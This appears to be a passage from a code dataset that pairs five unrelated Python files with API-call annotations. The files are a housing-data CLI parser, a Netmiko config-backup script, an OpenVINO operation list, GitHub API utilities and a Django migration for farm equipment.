| [((19, 4, 19, 86), 'requests.post', 'requests.post', (), '', False, 'import requests\n'), ((28, 22, 28, 46), 'tempfile.mkstemp', 'tempfile.mkstemp', ({(28, 39, 28, 45): '"""png)"""'}, {}), "('png)')", False, 'import tempfile\n'), ((9, 16, 9, 39), 'osbot_aws.apis.Secrets', 'Secrets', ({(9, 24, 9, 38): '"""slack-gs-bot"""'}, {}), "('slack-gs-bot')", False, 'from osbot_aws.apis import Secrets\n')] |
DeseineClement/bigdata-housing-classifier | src/system_io/input.py | aa864056c8b25217821f59d16c1ba5725c21a185 | from sys import argv
from getopt import getopt
from os import R_OK, access
from string import Template
DEFAULT_DATASET_FILE_PATH = "dataset/data.csv"
DEFAULT_DATASET_COLUMNS = ['surface (m2)', 'height (m)', 'latitude', 'housing_type', 'longitude', 'country_code',
'city']
DEFAULT_VISU = ["scatter_plot", "histogram"]
DEFAULT_RANGE = [0, 1000]
def arguments():
options, *_ = getopt(argv[1:], 'dc', ['dataset-file=', 'columns=', 'visus=', 'range='])
dataset_file = DEFAULT_DATASET_FILE_PATH
dataset_columns = DEFAULT_DATASET_COLUMNS
dataset_visus = DEFAULT_VISU
dataset_range = DEFAULT_RANGE
for opt, arg in options:
if opt in ('-d', '--dataset-file'):
dataset_file = arg
elif opt in ('-c', '--columns'):
dataset_columns = arg.split(',')
elif opt in ('-v', '--visus'):
dataset_visus = arg.split(',')
elif opt in ('-r', '--range'):
dataset_range = arg.split(',')
dataset_range = list(map(lambda x: int(x), dataset_range))
if len(dataset_range) == 1 :
dataset_range.append(DEFAULT_RANGE[1])
if not access(dataset_file, R_OK):
raise RuntimeError(Template("the file $file does not exists or is not readable.").substitute(file=dataset_file))
for column in dataset_columns:
if column not in DEFAULT_DATASET_COLUMNS:
raise RuntimeError(Template("Invalid column $column must be one of $columns.").
substitute(column=column, columns=','.join(DEFAULT_DATASET_COLUMNS)))
for visu in dataset_visus:
if visu not in DEFAULT_VISU:
raise RuntimeError(Template("Invalid visu $column must be one of $columns.").
substitute(column=visu, columns=','.join(DEFAULT_VISU)))
for range_num in dataset_range:
if range_num not in range(0, 1001):
raise RuntimeError(Template("Invalid range $column must be between 0 and 999.").
substitute(column=range_num))
return dataset_file, dataset_columns, dataset_visus, dataset_range
| [((13, 18, 13, 91), 'getopt.getopt', 'getopt', ({(13, 25, 13, 33): 'argv[1:]', (13, 35, 13, 39): '"""dc"""', (13, 41, 13, 90): "['dataset-file=', 'columns=', 'visus=', 'range=']"}, {}), "(argv[1:], 'dc', ['dataset-file=', 'columns=', 'visus=', 'range='])", False, 'from getopt import getopt\n'), ((32, 11, 32, 37), 'os.access', 'access', ({(32, 18, 32, 30): 'dataset_file', (32, 32, 32, 36): 'R_OK'}, {}), '(dataset_file, R_OK)', False, 'from os import R_OK, access\n'), ((33, 27, 33, 89), 'string.Template', 'Template', ({(33, 36, 33, 88): '"""the file $file does not exists or is not readable."""'}, {}), "('the file $file does not exists or is not readable.')", False, 'from string import Template\n'), ((37, 31, 37, 90), 'string.Template', 'Template', ({(37, 40, 37, 89): '"""Invalid column $column must be one of $columns."""'}, {}), "('Invalid column $column must be one of $columns.')", False, 'from string import Template\n'), ((42, 31, 42, 88), 'string.Template', 'Template', ({(42, 40, 42, 87): '"""Invalid visu $column must be one of $columns."""'}, {}), "('Invalid visu $column must be one of $columns.')", False, 'from string import Template\n'), ((47, 31, 47, 91), 'string.Template', 'Template', ({(47, 40, 47, 90): '"""Invalid range $column must be between 0 and 999."""'}, {}), "('Invalid range $column must be between 0 and 999.')", False, 'from string import Template\n')] |
Tes3awy/Ntemiko-Examples | netmiko/example7.py | b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba | # Must run example4.py first
# Read an Excel sheet and save running config of devices using pandas
import pandas as pd
from netmiko import ConnectHandler
# Read Excel file of .xlsx format
data = pd.read_excel(io="Example4-Device-Details.xlsx", sheet_name=0)
# Convert data to data frame
df = pd.DataFrame(data=data)
# Conevrt data frame from MGMT IP Address to a list
device_ip_list = df.iloc[:, 1].tolist()
# Define devices variable
devices = []
for ip in device_ip_list:
devices.append(
{
"device_type": "cisco_ios", # must be the same for all devices
"ip": ip,
"username": "developer", # must be the same for all devices
"password": "C1sco12345", # must be the same for all devices
"port": 22, # must be the same for all devices
# If port for all devices is not 22 you will get an error
"fast_cli": False,
}
)
for device in devices:
# Create a connection instance
with ConnectHandler(**device) as net_connect:
# hostname of the current device
hostname = net_connect.send_command(
command_string="show version", use_textfsm=True
)[0]["hostname"]
run_cfg: str = net_connect.send_command(command_string="show running-config")
# Create .txt for each running configuration of each device
with open(file=f"{hostname}_ex7-run-cfg.txt", mode="w") as outfile:
outfile.write(run_cfg.lstrip())
print("Done")
| [((9, 7, 9, 69), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((12, 5, 12, 28), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((35, 9, 35, 33), 'netmiko.ConnectHandler', 'ConnectHandler', ({}, {}), '(**device)', False, 'from netmiko import ConnectHandler\n')] |
plaidml/openvino | inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py | e784ab8ab7821cc1503d9c5ca6034eea112bf52b | # Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
VERIFIED_OP_REFERENCES = [
'Abs-1',
'Acos-1',
'Add-1',
'Asin-1',
'Asinh-3',
'Assign-6',
'AvgPool-1',
'BatchNormInference-5',
'BatchToSpace-2',
'BinaryConvolution-1',
'Broadcast-1',
'Broadcast-3',
'Bucketize-3',
'Ceiling-1',
'CTCGreedyDecoder-1',
'CTCGreedyDecoderSeqLen-6',
'Concat-1',
'Convert-1',
'ConvertLike-1',
'Convolution-1',
'Constant-1',
'Cos-1',
'Cosh-1',
'DeformableConvolution-1',
'DeformablePSROIPooling-1',
'DepthToSpace-1',
'DetectionOutput-1',
'Divide-1',
'ExperimentalDetectronDetectionOutput-6',
'ExperimentalDetectronGenerateProposalsSingleImage-6',
'ExperimentalDetectronPriorGridGenerator-6',
'ExperimentalDetectronROIFeatureExtractor-6',
'ExperimentalDetectronTopKROIs-6',
'FakeQuantize-1',
'Floor-1'
'FloorMod-1'
'GRUSequence-5',
'Gather-1',
'GatherElements-6',
'GatherND-5',
'Gelu-7',
'GRN-1',
'GroupConvolution-1',
'GroupConvolutionBackpropData-1',
'GRUSequence-5',
'HSigmoid-5',
'HSwish-4',
'HardSigmoid-1',
'Interpolate-4',
'LRN-1',
'LSTMCell-4',
'LSTMSequence-5',
'LogSoftmax-5',
'Loop-5',
'MVN-6',
'Maximum-1',
'MaxPool-1',
'Mish-4',
'Multiply-1',
'Negative-1',
'NonMaxSuppression-4',
'NonMaxSuppression-5',
'NonZero-3',
'NormalizeL2-1',
'PriorBox-1',
'PriorBoxClustered-1',
'Proposal-1',
'Proposal-4',
'PSROIPooling-1',
'RNNSequence-5',
'ROIAlign-3',
'ROIPooling-2',
'Range-1',
'Range-4',
'ReadValue-6',
'ReduceL1-4',
'ReduceL2-4',
'ReduceLogicalAnd-1',
'ReduceLogicalOr-1',
'ReduceMax-1',
'ReduceMean-1',
'ReduceMin-1',
'ReduceProd-1',
'ReduceSum-1',
'RegionYOLO-1',
'Relu-1',
'ReorgYOLO-2',
'Result-1'
'Round-5',
'SpaceToDepth-1',
'ScatterNDUpdate-4',
'Select-1',
'ShapeOf-1',
'ShapeOf-3',
'ShuffleChannels-1',
'Sigmoid-1',
'Sign-1',
'Sin-1',
'Sinh-1'
'SoftPlus-4',
'Softmax-1',
'Split-1',
'Squeeze-1',
'StridedSlice-1',
'Subtract-1',
'Swish-4',
'Tile-1',
'TopK-1',
'TopK-3',
'Transpose-1',
'Unsqueeze-1',
'VariadicSplit-1',
]
| [] |
mahanthathreyee/ghub | ghub/githubutils.py | b212ca068ef530d034095e6ef5d964e4e78dc022 | """Utilities for interacting with GitHub"""
import os
import json
import webbrowser
import stat
import sys
from git import Repo
from .context import Context
event_dict = {
"added_to_project": (
lambda event: "{} added the issue to a project.".format(event["actor"]["login"])
),
"assigned": (
lambda event: "{} assigned the issue to {}.".format(
event["actor"]["login"], event["assignee"]["login"]
)
),
"closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])),
"converted_note_to_issue": (
lambda event: "{} created this issue from a note.".format(
event["actor"]["login"]
)
),
"demilestoned": (lambda event: "The issue was removed from a milestone."),
"head_ref_deleted": (lambda event: "The pull request's branch was deleted."),
"head_ref_restored": (lambda event: "The pull request's branch was restored."),
"labelled": (
lambda event: "{} added {} label to the issue.".format(
event["actor"]["login"], event["label"]
)
),
"locked": (
lambda event: "The issue was locked by {}.".format(event["actor"]["login"])
),
"mentioned": (
lambda event: "{} was mentioned in the issue's body.".format(
event["actor"]["login"]
)
),
"marked_as_duplicate": (
lambda event: "The issue was marked duplicate by {}.".format(
event["actor"]["login"]
)
),
"merged": (
lambda event: "The issue was merged by {}.".format(event["actor"]["login"])
),
"milestoned": (lambda event: "The issue was added to a milestone."),
"moved_columns_in_project": (
lambda event: "The issue was moved between columns in a project board."
),
"referenced": (lambda event: "The issue was referenced from a commit message."),
"renamed": (lambda event: "The title of the issue was changed."),
"reopened": (
lambda event: "The issue was reopened by {}".format(event["actor"]["login"])
),
"review_dismissed": (
lambda event: "{} dismissed a review from the pull request.".format(
event["actor"]["login"]
)
),
"review_requested": (
lambda event: "{} requested review from the subject on this pull request.".format(
event["actor"]["login"]
)
),
"review_request_removed": (
lambda event: "{} removed the review request for the subject on this pull request.".format(
event["actor"]["login"]
)
),
"subscribed": (
lambda event: "{} subscribed to receive notifications for the issue.".format(
event["actor"]["login"]
)
),
"transferred": (lambda event: "The issue was transferred to another repository."),
"unassigned": (
lambda event: "{} was unassigned from the issue.".format(
event["actor"]["login"]
)
),
"unlabeled": (lambda event: "A label was removed from the issue."),
"unlocked": (
lambda event: "The issue was unlocked by {}".format(event["actor"]["login"])
),
"unmarked_as_duplicate": (lambda event: "The was unmarked as dublicate."),
"user_blocked": (lambda event: "A user was blocked from the organization."),
}
def authorize(ghub, reauthorize=False, fromenv=False):
"""Authorize a user for GHub
Keyword arguments:
ghub -- the ghub object that needs authorization
reauthorize -- performs authorization again (default False)
"""
if fromenv:
oauth_data = json.loads(os.environ["GHUB_CRED"])
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
if not os.path.isfile(ghub.data_path / ghub.auth_filename) or reauthorize:
authorization_base_url = "https://github.com/login/oauth/authorize"
token_url = "https://github.com/login/oauth/access_token"
authorization_url, _ = ghub.github.authorization_url(authorization_base_url)
webbrowser.open(authorization_url)
print("Please visit this site and grant access: {}".format(authorization_url))
redirect_response = input(
"Please enter the URL you were redirected to after granting access: "
)
try:
response = ghub.github.fetch_token(
token_url,
client_secret=ghub.client_secret,
authorization_response=redirect_response,
)
except Exception as e:
print(e)
print(
"Network Error. Make sure you have a working internet connection and try again."
)
sys.exit(1)
if not os.path.isdir(ghub.data_path):
os.makedirs(ghub.data_path)
data_file = open(ghub.data_path / ghub.auth_filename, "w+")
json.dump(response, data_file)
data_file.close()
os.chmod(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR)
ghub.oauth_data = response
return True
else:
data_file = open(ghub.data_path / ghub.auth_filename, "r")
oauth_data = json.loads(data_file.read())
data_file.close()
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
def get_user(ghub, user):
url = ghub.api_url + ghub.endpoints["users"] + user
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "user"
ghub.context.location = user
ghub.context.cache = response.json()
return True
return False
def get_org(ghub, org):
url = ghub.api_url + ghub.endpoints["orgs"] + org
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "org"
ghub.context.location = org
ghub.context.cache = response.json()
return True
return False
def get_user_tabs(ghub, tab=""):
tabs = ["repos", "stars", "followers", "following", "notifications"]
if tab not in tabs:
print("{} is not a valid user tab".format(tab))
return
if ghub.context.context == "root":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
response = ghub.github.get(ghub.api_url + ghub.endpoints["user"] + "/repos")
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "repos"
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "stars"
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/" + tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif tab == "notifications":
response = ghub.github.get(ghub.api_url + ghub.endpoints["notifications"])
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif ghub.context.context == "user" or ghub.context.context == "org":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
if ghub.context.context == "user":
url = (
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/repos"
)
else:
url = (
ghub.api_url
+ ghub.endpoints["orgs"]
+ ghub.context.location
+ "/repos"
)
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "repos"
)
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "star"
)
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/"
+ tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.context.prev_context.location + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
else:
pass
def get_latest_commit(ghub, repo, branch="master"):
api_url = "https://api.github.com/repos/{}/branches/{}".format(repo, branch)
response = ghub.github.get(api_url)
if response.status_code == 200:
response = response.json()
return response["commit"]["commit"]
else:
return False
def get_tree(ghub, repo=None, branch="master", tree_url=None):
if tree_url == None:
latest_commit = get_latest_commit(ghub, repo, branch)
if latest_commit == False:
return False
response = ghub.github.get(latest_commit["tree"]["url"])
if response.status_code == 200:
response = response.json()
return response
return False
else:
response = ghub.github.get(tree_url)
if response.status_code == 200:
response = response.json()
return response
def get_blob(ghub, blob_url):
response = ghub.github.get(blob_url)
if response.status_code == 200:
return response.json()
return False
def clone_repo(ghub, dir, repo_name=None):
print("Preparing to clone...")
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
if dir[0] == "~":
dir = os.path.expanduser("~") + dir[1:]
dir = dir + "/" + repo_name.split("/")[1]
try:
Repo.clone_from("https://github.com/" + repo_name, dir)
print("{} cloned to {}".format(repo_name, dir))
return True
except Exception as e:
print(e)
return False
def star_repo(ghub, repo_name=None):
print("Starring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
print("Repo is already starred.")
elif response.status_code == 404:
resp = ghub.github.put(star_url)
if resp.status_code == 204:
print("{} starred".format(repo_name))
else:
print("Error starring repo")
def unstar_repo(ghub, repo_name=None):
print("Unstarring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
resp = ghub.github.delete(star_url)
if resp.status_code == 204:
print("{} unstarred".format(repo_name))
else:
print("Error unstarring repo")
elif response.status_code == 404:
print("Repo is not starred.")
def watch_repo(ghub, repo_name=None):
print("Subscribing to repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
print("You are already watching this repo.")
elif response.status_code == 404:
resp = ghub.github.put(watch_url)
if resp.status_code == 200:
print("Watching {}".format(repo_name))
else:
print("Error subscribing to repo")
def unwatch_repo(ghub, repo_name=None):
print("Unsubscribing repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
resp = ghub.github.delete(watch_url)
if resp.status_code == 204:
print("{} unsubscribed".format(repo_name))
else:
print("Error unsubscribing to repo")
elif response.status_code == 404:
print("You are not watching this repo.")
def fork_repo(ghub, repo_name=None):
print("Forking Repo...")
if repo_name == None:
repo_name = ghub.context.location.split("/")
repo_name = "/".join(repo_name[:2])
true_repo_name = repo_name.split("/")[1]
forked_url = (
ghub.api_url
+ ghub.endpoints["repos"]
+ ghub.get_user_username()
+ "/"
+ true_repo_name
)
response = ghub.github.get(forked_url)
if response.status_code == 200:
print("Cannot fork. Repo Already Exists.")
return False
print("Repo is being forked. Please wait for it to complete.", end="")
response = ghub.github.post(
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/forks"
)
if response.status_code == 202:
print(
"\nForking complete. Forked repo to {}".format(
ghub.get_user_username() + "/" + true_repo_name
)
)
return True
else:
print("Error while trying fork.")
return False
def get_prs(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls"
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_requests"
ghub.context.location = repo_name + "/pull_requests"
ghub.context.cache = response.json()
return True
return False
def get_pr(ghub, pr_no):
if not pr_no.isdigit():
print("Invalid PR number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls/" + pr_no
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_request"
ghub.context.location = repo_name + "/pull_requests/" + pr_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No PR found with PR number {}".format(pr_no))
return False
def get_pr_info(ghub, info_type="comments"):
info_url = ghub.context.cache["_links"][info_type]["href"]
response = ghub.github.get(info_url)
return response.json(), response.status_code
def get_issues(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues"
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issues"
ghub.context.location = repo_name + "/issues"
ghub.context.cache = response.json()
return True
return False
def get_issue(ghub, issue_no):
if not issue_no.isdigit():
print("Invalid issue number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = (
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues/" + issue_no
)
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issue"
ghub.context.location = repo_name + "/issues/" + issue_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No issue found with issue number {}".format(issue_no))
return False
def get_issue_info(ghub, info_type="comments"):
info_url = ghub.context.cache["{}_url".format(info_type)]
response = ghub.github.get(info_url)
return response.json(), response.status_code
| [((102, 21, 102, 56), 'json.loads', 'json.loads', ({(102, 32, 102, 55): "os.environ['GHUB_CRED']"}, {}), "(os.environ['GHUB_CRED'])", False, 'import json\n'), ((110, 8, 110, 42), 'webbrowser.open', 'webbrowser.open', ({(110, 24, 110, 41): 'authorization_url'}, {}), '(authorization_url)', False, 'import webbrowser\n'), ((130, 8, 130, 38), 'json.dump', 'json.dump', ({(130, 18, 130, 26): 'response', (130, 28, 130, 37): 'data_file'}, {}), '(response, data_file)', False, 'import json\n'), ((132, 8, 132, 82), 'os.chmod', 'os.chmod', ({(132, 17, 132, 52): '(ghub.data_path / ghub.auth_filename)', (132, 54, 132, 81): '(stat.S_IRUSR | stat.S_IWUSR)'}, {}), '(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR)', False, 'import os\n'), ((321, 8, 321, 63), 'git.Repo.clone_from', 'Repo.clone_from', ({(321, 24, 321, 57): "('https://github.com/' + repo_name)", (321, 59, 321, 62): 'dir'}, {}), "('https://github.com/' + repo_name, dir)", False, 'from git import Repo\n'), ((106, 11, 106, 62), 'os.path.isfile', 'os.path.isfile', ({(106, 26, 106, 61): '(ghub.data_path / ghub.auth_filename)'}, {}), '(ghub.data_path / ghub.auth_filename)', False, 'import os\n'), ((127, 15, 127, 44), 'os.path.isdir', 'os.path.isdir', ({(127, 29, 127, 43): 'ghub.data_path'}, {}), '(ghub.data_path)', False, 'import os\n'), ((128, 12, 128, 39), 'os.makedirs', 'os.makedirs', ({(128, 24, 128, 38): 'ghub.data_path'}, {}), '(ghub.data_path)', False, 'import os\n'), ((318, 14, 318, 37), 'os.path.expanduser', 'os.path.expanduser', ({(318, 33, 318, 36): '"""~"""'}, {}), "('~')", False, 'import os\n'), ((126, 12, 126, 23), 'sys.exit', 'sys.exit', ({(126, 21, 126, 22): '(1)'}, {}), '(1)', False, 'import sys\n')] |
fagrimacs/fagrimacs_production | equipments/migrations/0001_initial.py | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | # Generated by Django 3.0.7 on 2020-09-18 05:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Equipment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(choices=[(None, 'Please select'), ('tractor', 'Tractor'), ('implement', 'Implement'), ('other_equipment', 'Other Equipment')], max_length=100, verbose_name='What Equipment you want to Add?')),
],
),
migrations.CreateModel(
name='ImplementCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='implements_category')),
],
options={
'verbose_name_plural': 'Implement Categories',
},
),
migrations.CreateModel(
name='Phone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.CharField(max_length=18)),
],
),
migrations.CreateModel(
name='TractorCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='tractor_category')),
],
options={
'verbose_name_plural': 'Tractor Categories',
},
),
migrations.CreateModel(
name='Tractor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('drive_type', models.CharField(choices=[(None, 'Please Select'), ('two wheel drive', 'Two wheel Drive'), ('four wheel drive', 'Four wheel Drive')], max_length=100, verbose_name='What Drive Type')),
('name', models.CharField(help_text='eg. John Deere 6190R', max_length=200, verbose_name='Name/Models of Tractor')),
('mode_of_transmission', models.CharField(choices=[(None, 'Please Select'), ('gear', 'Gear'), ('manual', 'Manual'), ('hydrostatic', 'Hydrostatic'), ('turbochanged', 'Turbocharged')], max_length=100, verbose_name='Mode of Transmission')),
('engine_hp', models.PositiveIntegerField(verbose_name='Engine Horse Power (eg. 75hp)')),
('drawbar_hp', models.PositiveIntegerField(verbose_name='Drawbar Horse Power (eg. 65hp)')),
('pto_hp', models.PositiveIntegerField(verbose_name='PTO Horse Power (eg. 85hp)')),
('hydraulic_capacity', models.CharField(help_text='Use a SI units of gpm or psi', max_length=100, verbose_name='Hydaulic capacity (gallon per minutes(gpm) or psi-pound per square inchies)')),
('type_of_hitching', models.CharField(choices=[(None, 'Please Select'), ('two point hitches', 'Two-point hitches'), ('three point hitches', 'Three-point hitches')], max_length=100, verbose_name='What is Hitching type?')),
('cab', models.BooleanField(default=False, verbose_name='Does have a cab?')),
('rollover_protection', models.BooleanField(default=False, verbose_name='Does have the rollover protection?')),
('fuel_consumption', models.PositiveIntegerField(verbose_name='Fuel consumption (gallon per hour on operation)')),
('attachment_mode', models.CharField(choices=[(None, 'Please select'), ('frontend loader', 'frontend loader'), ('backhoe', 'Backhoe'), ('both', 'Both')], max_length=100, verbose_name='What mode of attachment?')),
('operator', models.BooleanField(default=False, verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real tractor you have, only 5 picture.', upload_to='tractors_photos/', verbose_name='Upload the Tractor pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Tractor')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour in TShs.')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('farm_services', multiselectfield.db.fields.MultiSelectField(choices=[('soil cultivations', 'Soil cultivations'), ('planting', 'Planting'), ('haversting/post-haversting', 'Haversting/Post-Haversting'), ('fertilizing & pest-control', 'Fertilizing & Pest-control'), ('drainage & irrigation', 'Drainage & Irrigation'), ('loading', 'Loading'), ('hay making', 'Hay making'), ('miscellaneous', 'Miscellaneous')], max_length=135, verbose_name='What are farming service(s) do you offer?')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do your Accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('tractor_type', models.ForeignKey(on_delete=models.SET('others'), to='equipments.TractorCategory', verbose_name='What type of Tractor?')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ImplementSubCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='equipments.ImplementCategory')),
],
options={
'verbose_name_plural': 'Implement Subcategories',
},
),
migrations.CreateModel(
name='Implement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('name', models.CharField(max_length=100, verbose_name='Name/Models of Implement')),
('width', models.PositiveIntegerField(help_text='SI UNITS in metre', verbose_name='Width of the Implement')),
('weight', models.PositiveIntegerField(help_text='SI UNITS in KG', verbose_name='Weight of the Implement')),
('operation_mode', models.CharField(choices=[(None, 'Please Select'), ('tractor drive', 'Tractor drive'), ('self-propelled', 'Self-propelled')], max_length=100, verbose_name='What is mode of operation?')),
('pto', models.PositiveIntegerField(verbose_name='What is Horse Power required for Operation?')),
('hydraulic_capacity', models.CharField(max_length=100, verbose_name='What is Hydaulic capacity required to lift?')),
('operator', models.BooleanField(verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real implement you have, only 5 pictures.', upload_to='implements_photos/', verbose_name='Upload the Implement pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Implement')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do your Accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('category', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementCategory', verbose_name='What category of your Implement')),
('subcategory', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementSubCategory', verbose_name='What is subcategory of your Implement')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [((14, 8, 14, 65), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', ({(14, 40, 14, 64): 'settings.AUTH_USER_MODEL'}, {}), '(settings.AUTH_USER_MODEL)', False, 'from django.db import migrations, models\n'), ((21, 23, 21, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((22, 25, 22, 232), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((28, 23, 28, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((29, 25, 29, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((30, 26, 30, 76), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n'), ((39, 23, 39, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((40, 26, 40, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((46, 23, 46, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((47, 25, 47, 